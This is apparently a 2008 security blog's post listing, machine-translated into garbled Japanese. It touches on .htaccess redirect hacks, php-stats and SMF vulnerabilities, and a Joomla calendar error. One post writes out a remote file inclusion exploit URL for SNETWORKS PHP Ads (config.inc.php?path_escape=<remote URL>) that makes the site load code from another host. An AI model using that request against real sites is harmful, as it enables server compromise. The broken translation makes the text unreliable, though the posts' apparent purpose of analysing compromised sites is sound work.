私はで述べたように、これらの日、 前のポスト 、私は悪意のあるトロイの木馬/マルウェアへのリンクを含むページを検索エンジンから来た訪問者をredirettareすることでハッキングの種類を分析する/勉強しています。
それは二つの方法でスマートな思考であることが判明として、そのシンプルさにあるファイル"。htaccessファイル"
2008年10月12日
これらの日私は多くの人々を感染と私はよく知られている統計情報を影響を及ぼす脆弱性の数に出くわした通常のチェックをやっているハッキングの"ケース"に取り組んでいるスクリプトのphp-0.1.9.2統計 (も使用でこのブログ)。
2008年10月5日
それが最近出版された(2008年10月4日)は、バージョン1.1.6で脆弱性が発見されたシンプルな機械フォーラムあなたは検閲ワードを記述する能力を与える投稿の内容に適用されるフィルタをバイパスすることができます(SMFまたは)、表示され、正常に機能してサイトなどのURLを指定します。
2008年10月4日
今日、私の仕事をして私が"インストールされているスクリプトを使用してサイトにつまずいSNETWORKS PHP広告 、それがハッキングの様々なタイプに対して脆弱であることを指摘し"。
私が分析されているサイトが原因でこのアプリケーションの代わりに使われていた場合、他の技術改ざんされていたかどうかを確認するためにいくつかの脆弱性をテストする必要がありました。 私は別の発見したが、今のために私は書く、リモートファイルのインクルードしかし、簡単にネットで探して発見され、使用する:
にhttp:// [Taget] / [パス] / config.inc.phpを?path_escape = <url includere>はしたいですか?
2008年10月4日
今日は、ビジネスコンポーネントで実験していたJoomlaの "と呼ばれるためのスケジュールをGoogleカレンダー(にあなたのCMSのホームページページに挿入できるようにする" Googleカレンダー )と同じイベントの管理。
私はホスティング(例えばアルバ)のいくつかはあなたがこれらのイベントのいずれかをクリックしたときにことを発見し、次のようなページを表示することによって、エラーになり、 "すぐに来る"。
![[RAW FIX] Joomla Gcalendar Components](http://www.capn3m0.org/wp-content/uploads/2008/10/croppercapture10.jpg "エラーユーザ名を忘れ")
Joomlaのユーザ名を忘れにイベントを表示するエラー
![[Win7/Vista] - ソリューションnvlddmkm.sysブルースクリーン - NVIDIAドライバ](http://www.capn3m0.org/wp-content/themes/freshnews/functions/thumb.php?src=wp-content/uploads/2009/10/bsod-150x150.png&w=35&h=35&zc=1&q=90){kind=small}
2008年10月12日
2コメント